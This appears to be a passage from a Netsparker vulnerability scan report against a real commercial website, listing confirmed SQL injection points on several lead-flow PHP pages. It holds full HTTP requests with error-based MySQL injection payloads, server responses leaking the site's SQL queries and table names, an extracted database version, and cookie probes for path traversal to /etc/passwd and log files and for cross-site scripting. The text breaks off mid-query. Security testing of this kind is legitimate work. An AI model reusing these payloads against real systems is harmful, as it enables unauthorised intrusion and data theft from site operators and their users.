Date: Wed, 20 Apr 2011 02:28:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=97ssd719pgv7qgc689p4am0r33; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/parl00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=55goopk5csis14ucrp3ihleh33; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/lodi00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0mdup40cv6snsbek3637c3vi94; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 